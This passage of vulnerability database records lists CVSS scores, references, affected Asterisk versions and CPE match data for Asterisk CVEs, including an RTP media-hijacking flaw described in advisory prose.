        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2017-04-17T16:59:00.277",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2016-007.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://www.debian.org/security/2016/dsa-3700"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Issue Tracking",
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=838832"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Issue Tracking",
        "Patch"
      ],
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1374733"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Issue Tracking",
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-26272"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2016-007.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://www.debian.org/security/2016/dsa-3700"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Issue Tracking",
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=838832"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Issue Tracking",
        "Patch"
      ],
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1374733"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Issue Tracking",
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-26272"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-399"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2017-09-02 16:29

Modified

2024-11-21 03:12

Severity ?

7.5 (High) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Summary

In res/res_rtp_asterisk.c in Asterisk 11.x before 11.25.2, 13.x before 13.17.1, and 14.x before 14.6.1 and Certified Asterisk 11.x before 11.6-cert17 and 13.x before 13.13-cert5, unauthorized data disclosure (media takeover in the RTP stack) is possible with careful timing by an attacker. The "strictrtp" option in rtp.conf enables a feature of the RTP stack that learns the source address of media for a session and drops any packets that do not originate from the expected address. This option is enabled by default in Asterisk 11 and above. The "nat" and "rtp_symmetric" options (for chan_sip and chan_pjsip, respectively) enable symmetric RTP support in the RTP stack. This uses the source address of incoming media as the target address of any sent media. This option is not enabled by default, but is commonly enabled to handle devices behind NAT. A change was made to the strict RTP support in the RTP stack to better tolerate late media when a reinvite occurs. When combined with the symmetric RTP support, this introduced an avenue where media could be hijacked. Instead of only learning a new address when expected, the new code allowed a new source address to be learned at all times. If a flood of RTP traffic was received, the strict RTP support would allow the new address to provide media, and (with symmetric RTP enabled) outgoing traffic would be sent to this new address, allowing the media to be hijacked. Provided the attacker continued to send traffic, they would continue to receive traffic as well.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2017-005.html	Vendor Advisory
cve@mitre.org	http://www.debian.org/security/2017/dsa-3964
cve@mitre.org	http://www.securitytracker.com/id/1039251	Third Party Advisory, VDB Entry
cve@mitre.org	https://bugs.debian.org/873907	Issue Tracking, Patch, Third Party Advisory
cve@mitre.org	https://issues.asterisk.org/jira/browse/ASTERISK-27013	Issue Tracking, Patch, Third Party Advisory
cve@mitre.org	https://rtpbleed.com	Third Party Advisory
cve@mitre.org	https://security.gentoo.org/glsa/201710-29
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2017-005.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.debian.org/security/2017/dsa-3964
af854a3a-2127-422b-91ae-364da2661108	http://www.securitytracker.com/id/1039251	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://bugs.debian.org/873907	Issue Tracking, Patch, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://issues.asterisk.org/jira/browse/ASTERISK-27013	Issue Tracking, Patch, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://rtpbleed.com	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://security.gentoo.org/glsa/201710-29

Impacted products

Vendor	Product	Version
digium	asterisk	13.0.0
digium	asterisk	13.0.0
digium	asterisk	13.0.0
digium	asterisk	13.0.0
digium	asterisk	13.0.1
digium	asterisk	13.0.2
digium	asterisk	13.1.0
digium	asterisk	13.1.0
digium	asterisk	13.1.0
digium	asterisk	13.1.1
digium	asterisk	13.2.0
digium	asterisk	13.2.0
digium	asterisk	13.2.1
digium	asterisk	13.3.0
digium	asterisk	13.3.2
digium	asterisk	13.4.0
digium	asterisk	13.4.0
digium	asterisk	13.5.0
digium	asterisk	13.5.0
digium	asterisk	13.6.0
digium	asterisk	13.7.0
digium	asterisk	13.7.0
digium	asterisk	13.7.1
digium	asterisk	13.7.2
digium	asterisk	13.8.0
digium	asterisk	13.8.0
digium	asterisk	13.8.1
digium	asterisk	13.8.2
digium	asterisk	13.9.0
digium	asterisk	13.9.1
digium	asterisk	13.10.0
digium	asterisk	13.10.0
digium	asterisk	13.11.0
digium	asterisk	13.11.1
digium	asterisk	13.11.2
digium	asterisk	13.12
digium	asterisk	13.12.0
digium	asterisk	13.12.1
digium	asterisk	13.12.2
digium	asterisk	13.13
digium	asterisk	13.13.0
digium	asterisk	13.13.1
digium	asterisk	13.14.0
digium	asterisk	13.14.0
digium	asterisk	13.14.0
digium	asterisk	13.14.1
digium	asterisk	13.15.0
digium	asterisk	13.15.0
digium	asterisk	13.15.0
digium	asterisk	13.15.0
digium	asterisk	13.15.1
digium	asterisk	13.16.0
digium	asterisk	13.16.0
digium	asterisk	13.16.0
digium	asterisk	13.17.0
digium	asterisk	13.17.0
digium	asterisk	14.0
digium	asterisk	14.0.0
digium	asterisk	14.0.0
digium	asterisk	14.0.0
digium	asterisk	14.0.0
digium	asterisk	14.0.0
digium	asterisk	14.0.1
digium	asterisk	14.0.2
digium	asterisk	14.1
digium	asterisk	14.01
digium	asterisk	14.1.0
digium	asterisk	14.1.1
digium	asterisk	14.1.2
digium	asterisk	14.02
digium	asterisk	14.2
digium	asterisk	14.2.0
digium	asterisk	14.2.1
digium	asterisk	14.3.0
digium	asterisk	14.3.0
digium	asterisk	14.3.0
digium	asterisk	14.3.1
digium	asterisk	14.4.0
digium	asterisk	14.4.0
digium	asterisk	14.4.0
digium	asterisk	14.4.0
digium	asterisk	14.4.1
digium	asterisk	14.5.0
digium	asterisk	14.5.0
digium	asterisk	14.5.0
digium	asterisk	14.6.0
digium	asterisk	14.6.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.1
digium	asterisk	11.0.2
digium	asterisk	11.1.0
digium	asterisk	11.1.0
digium	asterisk	11.1.0
digium	asterisk	11.1.0
digium	asterisk	11.1.1
digium	asterisk	11.1.2
digium	asterisk	11.2.0
digium	asterisk	11.2.1
digium	asterisk	11.2.2
digium	asterisk	11.4.0
digium	asterisk	11.6.0
digium	asterisk	11.6.0
digium	asterisk	11.6.0
digium	asterisk	11.6.1
digium	asterisk	11.7.0
digium	asterisk	11.7.0
digium	asterisk	11.7.0
digium	asterisk	11.8.0
digium	asterisk	11.8.0
digium	asterisk	11.8.0
digium	asterisk	11.8.0
digium	asterisk	11.8.1
digium	asterisk	11.9.0
digium	asterisk	11.9.0
digium	asterisk	11.9.0
digium	asterisk	11.9.0
digium	asterisk	11.10.0
digium	asterisk	11.10.0
digium	asterisk	11.10.1
digium	asterisk	11.10.1
digium	asterisk	11.10.2
digium	asterisk	11.11.0
digium	asterisk	11.11.0
digium	asterisk	11.12.0
digium	asterisk	11.12.0
digium	asterisk	11.12.1
digium	asterisk	11.13.0
digium	asterisk	11.13.0
digium	asterisk	11.13.1
digium	asterisk	11.14.0
digium	asterisk	11.14.0
digium	asterisk	11.14.0
digium	asterisk	11.14.1
digium	asterisk	11.14.2
digium	asterisk	11.15.0
digium	asterisk	11.15.0
digium	asterisk	11.15.1
digium	asterisk	11.16.0
digium	asterisk	11.17.0
digium	asterisk	11.17.1
digium	asterisk	11.18.0
digium	asterisk	11.18.0
digium	asterisk	11.19.0
digium	asterisk	11.20.0
digium	asterisk	11.21.0
digium	asterisk	11.21.0
digium	asterisk	11.21.1
digium	asterisk	11.21.2
digium	asterisk	11.22.0
digium	asterisk	11.22.0
digium	asterisk	11.23.0
digium	asterisk	11.23.0
digium	asterisk	11.23.1
digium	asterisk	11.24.0
digium	asterisk	11.24.1
digium	asterisk	11.25.0
digium	asterisk	11.25.1
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.0:*:*:*:lts:*:*:*",
              "matchCriteriaId": "E7D1238A-A8D2-485E-81FD-46038A883EC3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "E93A7967-9A04-424A-BDDB-A2B8289B9AC4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "8F75C9FF-6F95-4F6A-B683-FE2BEDE3AD10",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "68226156-42ED-4F0E-93E1-02DD57E582B6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "FB2C4E1E-6B90-4DCC-BC09-7D19FBA65C3F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "A4EB385E-28B5-4259-9431-99E1F32D61B7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "58C0FF1B-6188-4181-A139-1806328762BD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "890EBB8C-989B-4344-AC03-62B399076008",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "BD4AAECB-A2BC-45BA-BC63-E51C1FE6C334",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "121EACD3-D5E3-4691-8024-95996865BB65",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "136D6508-660E-410D-829A-7DD452BF8819",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "AEC2B3AA-EB24-4259-BED1-5DBC102FE9C1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "74B23D17-7356-4D37-8C73-E87896D1335B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.3.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CEA9DA4A-A3E6-4C46-9471-CCBFA71083AF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.3.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "81A8A6CB-D236-4AB3-8476-C2D34DB7EF31",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "599833A2-CBE9-479B-8A6E-AF79C5EED1DB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.4.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "B55719B3-7325-47E1-8D16-3F34B1F44385",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B870B3B7-E8DC-45A2-8FA4-657D005D00E3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.5.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "C91E9A3B-54EB-4819-94DD-30F7D0C90047",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "47189DF9-8E57-4BA6-9F52-B7A8229AE02A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.7.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "84AAFA3C-3CCD-4615-9725-169C303CF18F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.7.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "C92E0801-9E8F-4CF2-A4A0-48BCF550F2D4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.7.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5C1C39FA-EF1A-4F2B-87A0-A00BAE73C6A7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.7.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "677D1211-0B07-47B9-AB7A-E820E2B29561",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "84202BAF-29E1-472B-B11F-B73F6A8891CF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.8.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "FFC7120D-E6A0-4801-A1CC-3E143896EE72",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "BAF2A83D-D9AE-441D-8D4E-335BF9D28A63",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "7F5C1479-A540-4B7D-B00C-BD35EEC83BB4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "AC12556C-5E82-47D7-87E5-FBDC01A920DD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.9.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "461C1D2D-C4C1-4FF8-8231-38A2505F3523",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.10.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "66595711-8573-4A9B-A8FE-4943E3097AA8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.10.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "5D1FE3D4-A0B9-475A-9B89-B0222283A6A9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.11.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "9670B5AC-CBD1-484C-90F8-69B1A60B6054",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.11.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "EE5794B6-246C-415E-8E20-56447F152488",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.11.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "E726CA39-A763-4422-B59E-E9E12518EA4D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.12:*:*:*:*:*:*:*",
              "matchCriteriaId": "6A96EB57-835A-45B4-82F5-31F925A85629",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.12.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "206F1DC9-9E8F-4497-A354-4A14711993DC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.12.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "8D428364-E2AD-4BC6-9329-71793BC0EB61",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.12.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "08963910-E0BD-4487-B669-60E0BFA79863",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.13:*:*:*:*:*:*:*",
              "matchCriteriaId": "86B16D04-3808-4380-8F64-0C36B185C1F2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.13.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F3BD16A9-24BC-4FC1-81BA-A6D1FEF38D35",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.13.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "68BAAD53-DE75-41CA-BF60-C0363029D3A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.14.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "CDC383B3-27EF-4C37-94BE-F0D41B34CAFC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.14.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "A7824B34-06C3-403B-B6F3-C850D54438EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.14.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "17E86941-98F6-45A5-8646-6876F74D909F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.14.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "C6DB27C0-C74E-4E6A-AA63-09CFE73C2EF6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.15.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "6C443A3B-DF96-4A68-B046-DE13689CA974",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.15.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "5F3AC9AE-288C-4F0E-BF15-C3F4AF09D8E0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.15.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "796A6021-9FCA-4354-A47C-7500C363C168",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.15.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "EBB9D073-195F-4C2A-932E-7F027710DB25",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.15.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "604E58C8-9B81-4992-8993-4A6CB876EE08",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.16.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "077C4CB8-1FDE-45D3-82E6-CE09A22809B1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.16.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3CDB96CA-5AAE-4B39-8E01-2E72E3B476AE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.16.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "8EB33EC3-CDE0-40BD-B269-512AE074D278",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.17.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "363FA95F-03EF-4D6A-A40D-76D285D16255",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.17.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "FA96DC31-4BAC-4C5A-923C-EBBFFC7ABB52",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C949D5F5-6C0B-4B17-85B6-3A77D08CF967",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5D413741-BDB7-496D-A01B-75E2A98FDB5B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "29130F7F-DE00-43E1-A4A6-8F1F95D5CB19",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "25E94EC0-F577-4B2B-8B11-DC76278CDD42",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "101AD474-9B89-483D-84E8-08012677C55C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "D57E41F6-C2CF-4183-A78A-9531A88FB65D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "FB1F9BB8-F951-427E-B770-69C2ACEBDB28",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "7C4CE405-E923-4C9C-849A-D1031C4DB493",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "C039C0CE-9C9C-4D85-8D7C-574DCF9D920B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.01:*:*:*:*:*:*:*",
              "matchCriteriaId": "A1B2F2CC-18C3-46E7-8E7F-970622A710C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "04ECDFF1-9718-4FAE-B45B-4F8CCA82829E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "D2C4DA60-5701-4BD0-B2F9-D93B9E64111F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "0B12834D-2AF1-4AD1-AB23-859CAA5D3210",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.02:*:*:*:*:*:*:*",
              "matchCriteriaId": "89036D04-EA04-4041-9694-6768478D35F3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "B19070D3-9F03-43C7-9F31-9A54BD5F2441",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "E39BAA74-50A8-4087-8FF8-7C5922121319",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "6D29C253-B403-4B00-A626-3E3A920DC018",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.3.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5E9D8FA2-21EA-4384-8001-118DA7C959F0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.3.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3368DE88-7009-46A0-93F4-4D52BAD3D173",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.3.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "26586127-B68B-4476-8182-C49B1B1DCDC6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "6D1EFDCC-983E-4227-9FD5-456C16610BC8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "DFA7DBAD-BCA6-47D1-A92E-4EB7941F55F1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.4.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "02C6C827-97A6-4287-8B3E-DE29054242B3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.4.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "9BE4F7C1-BB82-44BA-BBFD-9F660330EC15",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.4.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "E4FCA146-5A72-4746-BE23-63271FBC4D47",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "4A0C90BB-C3FE-4A75-B739-0236C4256F7E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "46BD9466-0BC9-4B4D-928F-240CD46D306C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.5.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "06F456AD-19D3-49EF-82B1-07370F6499AA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.5.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "24A9997E-D0DC-45B0-B4DB-308667FA820E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "26202E79-98E0-4533-B4AE-1ABB2477F5A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "C3D7384F-DF1B-4ED7-B1D5-885B95774DDB",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F53B8453-F35A-49BE-8129-774BADF71BA7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "CCB0C07E-DA2F-4169-848D-C3315CDC1CB3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "410C43E6-5912-4C22-A592-7CF94402EEB7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:rc1:*:*:*:*:*:*",
